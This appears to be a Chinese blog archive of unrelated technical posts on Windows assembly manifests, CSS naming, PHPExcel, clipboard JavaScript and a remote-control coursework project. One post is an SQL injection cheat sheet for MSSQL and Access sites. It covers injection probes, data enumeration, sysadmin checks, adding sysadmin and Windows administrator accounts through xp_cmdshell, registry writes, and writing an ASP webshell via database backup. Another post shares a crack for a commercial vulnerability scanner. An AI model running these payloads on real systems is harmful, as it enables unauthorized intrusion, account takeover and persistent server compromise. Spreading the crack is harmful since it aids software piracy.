Assembly Manifest 通俗简易手册[转]

 
[现象]
对这个问题的研究是起源于这么一个现象:当你用VC++2005(或者其它.NET)写程序后,在自己的计算机上能毫无问题地运行,但是当把此exe文件拷贝到别人电脑上时,便不能运行了,大致的错误提示如下:应用程序配置不正确,请重新安装程序……或者是MSVCR80D.dll 没有找到什么的(我记得不是很清楚,不过大致是这样的)
 
 
[分析]
看到这样的提示,当然不会傻到重装咯。第一反应应该是什么配置有问题、或者是缺少了什么依赖的库文件;于是我就根据以前Windows缺少库文件的经验,把所有库文件(××.DLL)统统一股脑地复制到当前文件夹下来,满心欢喜以为可以运行了,以运行……@#¥@#%¥……还是挂了。
 
 
[探索]
于是开始网上搜索,我Google,我摆渡;渐渐我发现,这一切都和一个叫做***.manifest 类型的文件发生关系,那么到底什么是 .manifest 文件呢?他有什么用,以前为什么没有?
后来,经过艰苦努力,终于得知,原来这一切都是Windows 的Assembly Manifest搞的鬼。这个东东的作用就是为了解决 以前windows上的“Dll 地狱” 问题才产生的新的DLL管理解决方案。大家知道,Dll是动态加载共享库,同一个Dll可能被多个程序所使用,而所谓“Dll 地狱”就是当不通程序依赖的Dll相同,但版本不同时,由于系统不能分辨到底哪个是哪个,所以加载错了Dll版本,然后就挂了。于是盖茨就吸取了教训,搞了一个程序集清单的东东,每个程序都要有一个清单,这个清单存再和自己应用程序同名的.manifest文件中,里面列出其所需要的所有依赖,这儿所列出的依赖可不是简单地靠文件明来区分的,而是根据一种叫做“强文件名”的东西区分的,那么什么是强文件明呢?我们来看一下这个.manifest文件便知道了。
 
<?xml version=’1.0′ encoding=’UTF-8′ standalone=’yes’?>
<assembly xmlns=’urn:schemas-microsoft-com:asm.v1′ manifestVersion=’1.0′>
<dependency>
<dependentAssembly>
<assemblyIdentity type=’win32′ name=’Microsoft.VC80.CRT’ version=’8.0.50608.0′ processorArchitecture=’x86′ publicKeyToken=’1fc8b3b9a1e18e3b’ />
</dependentAssembly>
</dependency>
</assembly>
 
我们发现原来这是一个XML格式的文件,其中<dependency>这一部分指明了其依赖于一个名字叫做Microsoft.VC80.CRT的库。但是我们发现,<assemblyIdentity>属性里面还有其它的东东,分别是
type系统类型,version版本号,processorArchitecture平台环境,publicKeyToken公匙(一般用来标示一个公司)……把他们加在一起便成了“强文件名”了,有了这种“强文件名”,我们就可以根据其区分不同的版本、不同的平台……总之,有了这种强文件名,系统中可以有多个不同版本的相同的库共存而不会发生冲突。
 
 
[深入]
恩,那么现在,我们就来具体了解一下这一套机制。
首先是强弱文件名的问题。正如上面提到的那样,为了区分不同版本或不同厂商生成的相同的程序集,必须用一个Assembly Manifest程序清单来列出我这个程序集的强文件名--慢着,到这里你可能会问:刚才不是说Assembly Manifest程序清单是列出其所依赖的程序集的强文件名呢,怎么这里变成了当前文件的强文件明了呢?其实,Assembly Manifest程序清单有两部分功能,上面这个实例之所以标注了其所依赖的文件的强文件名是因为其是客户端的Assembly Manifest,在服务端有另外一个Manifest 来标注。
 
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?>
<assembly xmlns=”urn:schemas-microsoft-com:asm.v1″ manifestVersion=”1.0″>
<noInheritable></noInheritable>
<assemblyIdentity type=”win32″ name=”Microsoft.VC80.CRT” version=”8.0.50727.42″ processorArchitecture=”x86″ publicKeyToken=”1fc8b3b9a1e18e3b”></assemblyIdentity>
<file name=”msvcr80.dll” hash=”2a0d797a8c5eac76e54e98db9682e0938c614b45″ hashalg=”SHA1″><asmv2:hash xmlns:asmv2=”urn:schemas-microsoft-com:asm.v2″ xmlns:dsig=”http://www.w3.org/2000/09/xmldsig#”><dsig:Transforms><dsig:Transform Algorithm=”urn:schemas-microsoft-com:HashTransforms.Identity”></dsig:Transform></dsig:Transforms><dsig:DigestMethod Algorithm=”http://www.w3.org/2000/09/xmldsig#sha1″></dsig:DigestMethod><dsig:DigestValue>phRUExlAeZ8BwmlD8VlO5udAnRE=</dsig:DigestValue></asmv2:hash></file>
<file name=”msvcp80.dll” hash=”cc4ca55fb6aa6b7bb8577ab4b649ab77e42f8f91″ hashalg=”SHA1″><asmv2:hash xmlns:asmv2=”urn:schemas-microsoft-com:asm.v2″ xmlns:dsig=”http://www.w3.org/2000/09/xmldsig#”><dsig:Transforms><dsig:Transform Algorithm=”urn:schemas-microsoft-com:HashTransforms.Identity”></dsig:Transform></dsig:Transforms><dsig:DigestMethod Algorithm=”http://www.w3.org/2000/09/xmldsig#sha1″></dsig:DigestMethod><dsig:DigestValue>7AY1JqoUvK3u/6bYWbOagGgAFbc=</dsig:DigestValue></asmv2:hash></file>
<file name=”msvcm80.dll” hash=”55e8e87bbde00d1d96cc119ccd94e0c02c9a2768″ hashalg=”SHA1″><asmv2:hash xmlns:asmv2=”urn:schemas-microsoft-com:asm.v2″ xmlns:dsig=”http://www.w3.org/2000/09/xmldsig#”><dsig:Transforms><dsig:Transform Algorithm=”urn:schemas-microsoft-com:HashTransforms.Identity”></dsig:Transform></dsig:Transforms><dsig:DigestMethod Algorithm=”http://www.w3.org/2000/09/xmldsig#sha1″></dsig:DigestMethod><dsig:DigestValue>hWq8zazTsMeKVxWFBa6bnv4hEOw=</dsig:DigestValue></asmv2:hash></file>
</assembly>
这个便是从WINDOWS\WinSxS\Manifests目录下取出来的一个manifest文件,再这个文件夹下有一陀子这种XML格式的manifest文件,其是服务端的程序清单。WinSxs是windows XP以上版本提供的[blue]非托管并行缓存(side-by-side catche)[/blue]里面安装了各种版本的经过强文件名签名的系统库,而上面这个文件<assemblyIdentity>正是标注了系统中Microsoft.VC80.CRT的一个版本的强文件名签名,如果其和客户端。.manifest 清单里面<dependentAssembly>所列出的依赖项对上的话,就会被加载。刚才说的side-by-side 是指各种不同的版本并行运行。
上面这个服务端manifest文件中<file>标签具体指明了当前强文件名签名的到底是哪一个文件,其中还有这个文件的Hash签名,以确保文件的完整性。
 
好了,有了这一套机制,就可以非常非常安全地进行库文件关联了,但是、但是貌似还有一个一直困扰我们的问题:这套机制安全是安全了,但是却失去了以前良好的前后版本兼容性,即如果你的系统库发生了升级,那么服务端的版本号发生了变化,那岂不是所有服务端程序都不能使用了吗?其实,windows还使用一个policy的策略文件来确认映射关系。
 
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?>
<!– Copyright ? 1981-2001 Microsoft Corporation –>
<assembly xmlns=”urn:schemas-microsoft-com:asm.v1″ manifestVersion=”1.0″>
<assemblyIdentity type=”win32-policy” name=”policy.8.0.Microsoft.VC80.CRT” version=”8.0.50727.42″ processorArchitecture=”x86″ publicKeyToken=”1fc8b3b9a1e18e3b”/>
<dependency>
<dependentAssembly>
<assemblyIdentity type=”win32″ name=”Microsoft.VC80.CRT” processorArchitecture=”x86″ publicKeyToken=”1fc8b3b9a1e18e3b”/>
<bindingRedirect oldVersion=”8.0.41204.256-8.0.50608.0″ newVersion=”8.0.50727.42″/>
</dependentAssembly>
</dependency>
</assembly>
 
这便是在WINDOWS\WinSxS\Policies目录下的一个Policy文件,其中<bindingRedirect>标签便指定了所有8.0.41204.256-8.0.50608.0变本的客户需求映射到8.0.50727.42这个我现在系统中安装的比较新的版本的库。当然我们也能对别的字段进行映射,这样便能很好解决系统升级带来的问题。
 
[应用]
经过以上的讲解,大家对整个依赖查找过程都有了一个整体的认识,那么在实际中问题就好解决了。
让我们回到实际问题中,我之前说了,把一个程序编译连接成可执行程序后,在别人的电脑上发现找不到其所依赖的库了,那么怎么办呢?聪明的你自然想到把其所依赖的库相应的版本拷贝到目标计算机上面,可是……当你在拼命寻找那个可执行文件的assembly manifests文件的时候,却突然发现找不到了,在执行目录下面明明只有一个exe文件嘛。是不是没有生成呢?显然不会,原来是资源连接器把那个assembly manifests文件连接到了可执行文件里面了;不信,你可以用你的vc++打开一个可执行文件看看,在其资源项里面就有一个叫做RT_MANIFEST的项目。这个里面就是二进制标示的manifests文件。那么根据这里面提供的要求,将相应版本的依赖文件(一般就是CRT运行库)拷贝到系统目录Windows\WinSxS\,记住一般会是连带着一个特殊命名的目录一起拷贝到那个文件夹下,比如CRT的运行库就是WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50608.0_x-ww_b7acac55有这样一个目录,其标注了此库的版本号以及签名等信息,以防止多个版本重名时不能复制到同一WinSxS目录下。
 
这样就搞定了么?如果是以前,那么一切都解决了,系统会在这个目录下面找到这个运行库,可是现在单单这样可不行,系统可是要找到这个运行库的assembly manifests文件,并且对比强文件名之后才能加载,所以所以千万别忘了把相应的manifests文件拷贝到\WinSxS\Manifests目录下面。
 
当然,这样在目标的系统文件夹下面打动干戈,自然有些过于暴动了,还好,Windows还为我们提供了一种私有查找方式。这种方式会在前面的位置找不到合适库的时候在本地文件夹下面找。所以你只要把之前的库以及那个manifests文件一起拷贝到你的应用程序的路径下面,就可以使用啦。
 
根据MSDN的说明,在本地查找并加载遵循一下规则:
 
在应用程序本地文件夹中查找名为 <assemblyName>.manifest 的清单文件。在此示例中,加载程序试图在 appl.exe 所在的文件夹中查找 Microsoft.VC80.CRT.manifest。如果找到该清单,加载程序将从应用程序文件夹中加载 CRT DLL。如果未找到 CRT DLL,加载将失败。
 
尝试在 appl.exe 本地文件夹中打开文件夹 <assemblyName>,如果存在此文件夹,则从中加载清单文件 <assemblyName>.manifest。如果找到该清单,加载程序将从 <assemblyName> 文件夹中加载 CRT DLL。如果未找到 CRT DLL,加载将失败。
最后,我想补充的一点是,在你的VC++安装目录下面的“Microsoft Visual Studio 8\VC\redist”目录下,有着所有的提供发布的已经配备相应.manifest的库文件。所以你想要发布一个程序最简单最安全的做法(不用担心用户电脑是否包含你所需要的库)就是把这个目录下面的相应的库的文件夹和你的可执行文件放在一起发布。
比如在X86平台下如果你的可执行文件用到了CRT库(废话么),那么就拷贝Microsoft Visual Studio 8\VC\redist\x86\Microsoft.VC80.CRT这个文件夹到你的程序所在的目录,一起发布,就万事大吉啦!

mysql_query函数只能执行一条SQL语句

        这里做一下笔记,这说明MYSQL+PHP的安全性很高的。

 

###The reason that multiple queries are not supported is to help prevent exploits.###

 

For example, the user could enter something like:

 

  “; DELETE * FROM users;

 

in the name field of a form, which would erase everything in the table when the query is executed.

By allowing mysql_query to support only single commands, this hole is closed.



Modified At 2008-06-08 13:20:46

常用手工注入命令

1.判断是否有注入;and 1=1 ;and 1=2
 
2.初步判断是否是mssql ;and user>0
 
3.注入参数是字符’and [查询条件] and ”=’
 
4.搜索时没过滤参数的’and [查询条件] and ‘%25’=’
 
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
 
6.猜数据库 ;and (select Count(*) from [数据库名])>0
 
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
 
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
 
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
 
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));–
;and 1=(select IS_MEMBER(‘db_owner’));–
 
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;–
;exec master.dbo.sp_password null,username,password;–
;exec master.dbo.sp_addsrvrolemember sysadmin username;–
;exec master.dbo.xp_cmdshell ‘net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;–
;exec master.dbo.xp_cmdshell ‘net user username password /add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators username /add’;–
 
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ‘c:\’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in(‘上步得到的paths’))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
;insert temp exec master.dbo.xp_availablemedia;– 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;– 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;– 获得所有子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;– 查看文件的内容
 
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread
‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’CommonFilesDir’ 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’,’reg_sz’,’hello’ 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’ 删除某个值
xp_regdeletekey ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 删除键,包括该键下所有值
 
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’c:\l.asp’;
 
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
 
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’g:\wwwtest\l.asp’;

Class与ID的区别

 
一个Class是用来根据用户定义的标准对一个或多个元素进行定义的。打个比较恰当的比方就是剧本:一个Class可以定义剧本中每个人物的故事线,你可以通过CSS,Javascript等来使用这个类。因此你可以在一个页面上使用class=”Frodo” ,class=”Gandalf”, class=”Aragorn”来区分不同的故事线。还有一点非常重要的是你可以在一个文档中使用任意次数的Class。
  
至于 ID,通常用于定义页面上一个仅出现一次的标记。在对页面排版进行结构化布局时(比如说通常一个页面都是由一个页眉,一个报头< masthead>,一个内容区域和一个页脚等组成),一般使用ID比较理想,因为一个ID在一个文档中只能被使用一次。而这些元素在同一页面中很少会出现大于一次的情况。
  
归纳成一句话就是:Class可以反复使用而ID在一个页面中仅能被使用一次。有可能在很大部分浏览器中反复使用同一个ID不会出现问题,但在标准上这绝对是错误的使用,而且很可能导致某些浏览器的现实问题。(刚才在Dreamweaver中试了一下,确实,并没有出错)
  
在实际应用的时候,Class可能对文字的排版等比较有用,而ID则对宏观布局和设计放置各种元素较有用。

常用的DIV+CSS命名规则

 
头:header
内容:content/container
尾:footer
导航:nav
侧栏:sidebar
栏目:column
页面外围控制整体布局宽度:wrapper
左右中:left right center
登录条:loginbar
标志:logo
广告:banner
页面主体:main
热点:hot
新闻:news
下载:download
子导航:subnav
菜单:menu
子菜单:submenu
搜索:search
友情链接:friendlink
页脚:footer
版权:copyright
滚动:scroll
内容:content
标签页:tab
文章列表:list
提示信息:msg
小技巧:tips
栏目标题:title
加入:joinus
指南:guild
服务:service
注册:regsiter
状态:status
投票:vote
合作伙伴:partner
(二)注释的写法:
/* Footer */
内容区
/* End Footer */
(三)id的命名:
(1)页面结构
容器: container
页头:header
内容:content/container
页面主体:main
页尾:footer
导航:nav
侧栏:sidebar
栏目:column
页面外围控制整体布局宽度:wrapper
左右中:left right center
(2)导航
导航:nav
主导航:mainbav
子导航:subnav
顶导航:topnav
边导航:sidebar
左导航:leftsidebar
右导航:rightsidebar
菜单:menu
子菜单:submenu
标题: title
摘要: summary
(3)功能
标志:logo
广告:banner
登陆:login
登录条:loginbar
注册:regsiter
搜索:search
功能区:shop
标题:title
加入:joinus
状态:status
按钮:btn
滚动:scroll
标签页:tab
文章列表:list
提示信息:msg
当前的: current
小技巧:tips
图标: icon
注释:note
指南:guild
服务:service
热点:hot
新闻:news
下载:download
投票:vote
合作伙伴:partner
友情链接:link
版权:copyright
(四)class的命名:
(1)颜色:使用颜色的名称或者16进制代码,如
.red { color: red; }
.f60 { color: #f60; }
.ff8600 { color: #ff8600; }
(2)字体大小,直接使用”font+字体大小”作为名称,如
.font12px { font-size: 12px; }
.font9pt {font-size: 9pt; }
(3)对齐样式,使用对齐目标的英文名称,如
.left { float:left; }
.bottom { float:bottom; }
(4)标题栏样式,使用”类别+功能”的方式命名,如
.barnews { }
.barproduct { }
注意事项:
1.一律小写;
2.尽量用英文;
3.不加中杠和下划线;
4.尽量不缩写,除非一看就明白的单词.
主要的 master.css
模块 module.css
基本共用 base.css
布局,版面 layout.css
主题 themes.css
专栏 columns.css
文字 font.css
表单 forms.css
补丁 mend.css
打印 print.css

自己动手编写简单远程控制

最近大大小小的考试陆续来到,每个人都忙的无暇估计其他,当然也包括兄弟俺。一系列考试复习就够让人头疼了,麻烦的是还有4个VC的课程设计(3个帮其他人做的),害俺不得不把出版社的稿子一拖再拖。

8号终于考试完了,从8号到10号晚上连续通宵了三天,11号晚上休息了一次,今天(12号)晚上又来通宵了,一直在赶出版社的稿子,今晚估计就能搞定了。

博客前段时间换了空间,已经好久没更新了,这期也没空给黑防写稿子了,好忙。刚刚又到新浪体育上看了下,结果不出以外地看到国家队和国奥队双双惨败,一个0:4,一个2:7,真够丢人的,唉。

看完新闻后也不知道有什么事情好做,就写篇文章吧,既然不能花太多时间来写。想想在VC课程设计中我选的题目是做一个简单的远程控制软件,只要实现客户端与服务端的连接和发送信息,并控制服务端实现鼠标控制、关机重启、屏幕截取等简单功能就可以了。

今天就把我做的过程写下来吧,给新手一些参考,软件是VC6.0,建立的是MFC工程,通信和线程等功能实现均直接调用API,对控件的处理使用了相关类。

首先讲一下两方的通信过程:服务端启动后就进行监听,客户端主动连接服务端,连接成功后为其建立一个线程接收控制命令并进行处理。

下面讲解客户端的实现。
客户端的功能其实很简单,只要连接上服务端后就基本什么不用做了,当用户点击“发送控制”按钮后根据控制选项构造不同的命令进行发送。
下面是连接服务端的代码:

 



 

下面是“发送控制”按钮的响应函数,本示例程序中只有三种基本功能:信息发送(使对方弹出一个对话框,显示您所发送过去的信息)、系统控制(包括关机、重启、截获屏幕、弹出/关闭光驱5个子功能)、鼠标控制(包括随机移动、禁用输入、交换左右键3个子功能)。我使用了三个单选框来确定是哪类基本类型的控制,下拉框来进行子功能选择。因此每次控制要发送两次控制,第一次确定基本功能,第二次确定子功能。

 



 

下面再贴一段如何使服务端截获到的屏幕图像显示在picture控件中,因为时间比较紧张,我没有把图像传输这一块儿做好,就给偷了个懒,服务端截获到屏幕后直接保存在C盘根目录下,而控制端直接到该位置读取,哈哈,专门跟老师说了下,老师考虑到时间限制就放我了一马,其实就是用某些编码算法将图片压缩一下就可以了,例如JPEG,懒得弄了。

 



 

下面来看服务端,老规矩,先来看监听的函数。

 



 

接下来就是三个处理函数了,全部贴出来。注意这几个函数都要定义成全局的,不要定义成类的成员函数,那样的话在线程函数里面访问不到。

 




最后把一些函数的详细过程贴出来。

 


复制到剪贴板代码

 
<script type=”text/javascript”>
<!–
function copyToClipboard(txt)
{
 if(window.clipboardData)
 {
  window.clipboardData.clearData();
  window.clipboardData.setData(“Text”, txt);
  alert(“复制成功!”);
 }
 else if(navigator.userAgent.indexOf(“Opera”) != -1)
 {
  window.location = txt;
 }
 else if(window.netscape)
 {
  try
  {
   netscape.security.PrivilegeManager.enablePrivilege(“UniversalXPConnect”);
  }
  catch(e)
  {
   alert(“被浏览器拒绝!\n请在浏览器地址栏输入’about:config’并回车\n然后将’signed.applets.codebase_principal_support’设置为’true'”);
  }
  var clip = Components.classes[‘@mozilla.org/widget/clipboard;1’].createInstance(Components.interfaces.nsIClipboard);
  if (!clip)
  return;
  var trans = Components.classes[‘@mozilla.org/widget/transferable;1’].createInstance(Components.interfaces.nsITransferable);
  if (!trans)
  return;
  trans.addDataFlavor(‘text/unicode’);
  var str = new Object();
  var len = new Object();
  var str = Components.classes[“@mozilla.org/supports-string;1”].createInstance(Components.interfaces.nsISupportsString);
  var copytext = txt;
  str.data = copytext;
  trans.setTransferData(“text/unicode”,str,copytext.length*2);
  var clipid = Components.interfaces.nsIClipboard;
  if (!clip)
  return false;
  clip.setData(trans,null,clipid.kGlobalClipboard);
  alert(“复制成功!”);
 }
}
//–>
</script>
其实不用这么麻烦的
window.clipboardData.setData(‘text’, this.innerText);
就可以了
 

一句话让iframe自适应高度

在要自适应的“IFRAME”中加入:
onload=”this.height = document.frames(‘IFRAME_name’).document.body.scrollHeight;”
例:
<IFRAME name=”main” src=”” frameBorder=0 width=”580″ height=”300″ ōnload=”this.height = document.frames(‘main’).document.body.scrollHeight;”></IFRAME>

PHPExcel常用方法汇总

来源:http://blog.csdn.net/zeali/archive/2008/02/27/2124984.aspx
PHPExcel 是相当强大的 MS Office Excel 文档生成类库,当需要输出比较复杂格式数据的时候,PHPExcel 是个不错的选择。不过其使用方法相对来说也就有些繁琐。列举以记之。
 
[language=PHP]
<?  
//设置PHPExcel类库的include path  
set_include_path(‘.’. PATH_SEPARATOR .  
                 ‘D:\Zeal\PHP_LIBS’ . PATH_SEPARATOR .  
                 get_include_path());  
 
/** 
 * 以下是使用示例,对于以 //// 开头的行是不同的可选方式,请根据实际需要 
 * 打开对应行的注释。 
 * 如果使用 Excel5 ,输出的内容应该是GBK编码。 
 */ 
require_once ‘PHPExcel.php’;  
 
// uncomment  
////require_once ‘PHPExcel/Writer/Excel5.php’;    // 用于其他低版本xls  
// or  
////require_once ‘PHPExcel/Writer/Excel2007.php’; // 用于 excel-2007 格式  
 
// 创建一个处理对象实例  
$objExcel = new PHPExcel();  
 
// 创建文件格式写入对象实例, uncomment  
////$objWriter = new PHPExcel_Writer_Excel5($objExcel);    // 用于其他版本格式  
// or  
////$objWriter = new PHPExcel_Writer_Excel2007($objExcel); // 用于 2007 格式  
//$objWriter->setOffice2003Compatibility(true);  
 
//*************************************  
//设置文档基本属性  
$objProps = $objExcel->getProperties();  
$objProps->setCreator(“Zeal Li”);  
$objProps->setLastModifiedBy(“Zeal Li”);  
$objProps->setTitle(“Office XLS Test Document”);  
$objProps->setSubject(“Office XLS Test Document, Demo”);  
$objProps->setDescription(“Test document, generated by PHPExcel.”);  
$objProps->setKeywords(“office excel PHPExcel”);  
$objProps->setCategory(“Test”);  
 
//*************************************  
//设置当前的sheet索引,用于后续的内容操作。  
//一般只有在使用多个sheet的时候才需要显示调用。  
//缺省情况下,PHPExcel会自动创建第一个sheet被设置SheetIndex=0  
$objExcel->setActiveSheetIndex(0);  
 
 
$objActSheet = $objExcel->getActiveSheet();  
 
//设置当前活动sheet的名称  
$objActSheet->setTitle(‘测试Sheet’);  
 
//*************************************  
//设置单元格内容  
//  
//由PHPExcel根据传入内容自动判断单元格内容类型  
$objActSheet->setCellValue(‘A1’, ‘字符串内容’);  // 字符串内容  
$objActSheet->setCellValue(‘A2’, 26);            // 数值  
$objActSheet->setCellValue(‘A3’, true);          // 布尔值  
$objActSheet->setCellValue(‘A4’, ‘=SUM(A2:A2)’); // 公式  
 
//显式指定内容类型  
$objActSheet->setCellValueExplicit(‘A5’, ‘847475847857487584’,   
                                   PHPExcel_Cell_DataType::TYPE_STRING);  
 
//合并单元格  
$objActSheet->mergeCells(‘B1:C22’);  
 
//分离单元格  
$objActSheet->unmergeCells(‘B1:C22’);  
 
//*************************************  
//设置单元格样式  
//  
 
//设置宽度  
$objActSheet->getColumnDimension(‘B’)->setAutoSize(true);  
$objActSheet->getColumnDimension(‘A’)->setWidth(30);  
 
$objStyleA5 = $objActSheet->getStyle(‘A5’);  
 
//设置单元格内容的数字格式。  
//  
//如果使用了 PHPExcel_Writer_Excel5 来生成内容的话,  
//这里需要注意,在 PHPExcel_Style_NumberFormat 类的 const 变量定义的  
//各种自定义格式化方式中,其它类型都可以正常使用,但当setFormatCode  
//为 FORMAT_NUMBER 的时候,实际出来的效果被没有把格式设置为”0″。需要  
//修改 PHPExcel_Writer_Excel5_Format 类源代码中的 getXf($style) 方法,  
//在 if ($this->_BIFF_version == 0x0500) { (第363行附近)前面增加一  
//行代码:   
//if($ifmt === ‘0’) $ifmt = 1;  
//  
//设置格式为PHPExcel_Style_NumberFormat::FORMAT_NUMBER,避免某些大数字  
//被使用科学记数方式显示,配合下面的 setAutoSize 方法可以让每一行的内容  
//都按原始内容全部显示出来。  
$objStyleA5 
    ->getNumberFormat()  
    ->setFormatCode(PHPExcel_Style_NumberFormat::FORMAT_NUMBER);  
 
//设置字体  
$objFontA5 = $objStyleA5->getFont();  
$objFontA5->setName(‘Courier New’);  
$objFontA5->setSize(10);  
$objFontA5->setBold(true);  
$objFontA5->setUnderline(PHPExcel_Style_Font::UNDERLINE_SINGLE);  
$objFontA5->getColor()->setARGB(‘FF999999’);  
 
//设置对齐方式  
$objAlignA5 = $objStyleA5->getAlignment();  
$objAlignA5->setHorizontal(PHPExcel_Style_Alignment::HORIZONTAL_RIGHT);  
$objAlignA5->setVertical(PHPExcel_Style_Alignment::VERTICAL_CENTER);  
 
//设置边框  
$objBorderA5 = $objStyleA5->getBorders();  
$objBorderA5->getTop()->setBorderStyle(PHPExcel_Style_Border::BORDER_THIN);  
$objBorderA5->getTop()->getColor()->setARGB(‘FFFF0000’); // color  
$objBorderA5->getBottom()->setBorderStyle(PHPExcel_Style_Border::BORDER_THIN);  
$objBorderA5->getLeft()->setBorderStyle(PHPExcel_Style_Border::BORDER_THIN);  
$objBorderA5->getRight()->setBorderStyle(PHPExcel_Style_Border::BORDER_THIN);  
 
//设置填充颜色  
$objFillA5 = $objStyleA5->getFill();  
$objFillA5->setFillType(PHPExcel_Style_Fill::FILL_SOLID);  
$objFillA5->getStartColor()->setARGB(‘FFEEEEEE’);  
 
//从指定的单元格复制样式信息.  
$objActSheet->duplicateStyle($objStyleA5, ‘B1:C22’);  
 
 
//*************************************  
//添加图片  
$objDrawing = new PHPExcel_Worksheet_Drawing();  
$objDrawing->setName(‘ZealImg’);  
$objDrawing->setDescription(‘Image inserted by Zeal’);  
$objDrawing->setPath(‘./zeali.net.logo.gif’);  
$objDrawing->setHeight(36);  
$objDrawing->setCoordinates(‘C23’);  
$objDrawing->setOffsetX(10);  
$objDrawing->setRotation(15);  
$objDrawing->getShadow()->setVisible(true);  
$objDrawing->getShadow()->setDirection(36);  
$objDrawing->setWorksheet($objActSheet);  
 
 
//添加一个新的worksheet  
$objExcel->createSheet();  
$objExcel->getSheet(1)->setTitle(‘测试2’);  
 
//保护单元格  
$objExcel->getSheet(1)->getProtection()->setSheet(true);  
$objExcel->getSheet(1)->protectCells(‘A1:C22’, ‘PHPExcel’);  
 
 
//*************************************  
//输出内容  
//  
$outputFileName = “output.xls”;  
//到文件  
////$objWriter->save($outputFileName);  
//or  
//到浏览器  
////header(“Content-Type: application/force-download”);  
////header(“Content-Type: application/octet-stream”);  
////header(“Content-Type: application/download”);  
////header(‘Content-Disposition:inline;filename=”‘.$outputFileName.'”‘);  
////header(“Content-Transfer-Encoding: binary”);  
////header(“Expires: Mon, 26 Jul 1997 05:00:00 GMT”);  
////header(“Last-Modified: ” . gmdate(“D, d M Y H:i:s”) . ” GMT”);  
////header(“Cache-Control: must-revalidate, post-check=0, pre-check=0”);  
////header(“Pragma: no-cache”);  
////$objWriter->save(‘php://output’);  
 
?>
[/language]

Acunetix Web Vulnerability Scanner V5.1 破解版


 

信息来源:邪恶八进制信息安全团队(www.eviloctal.com

 

Acunetix Web Vulnerability Scanner V5.1


功能很好,很强大。就是操作界面比较复杂,需要时间摸索。

附件里是5.1版的破解文件,原版请到下面的地址去下载。
原版下载地址:http://www.skycn.com/soft/37545.html

下载好后,将破解文件放入安装文件同目录,破解后,输入任意注册码即可。经测试可以自动更新,大家爽吧!

 

 

 

下载地址:
破解补丁




Modified At 2008-06-01 02:30:03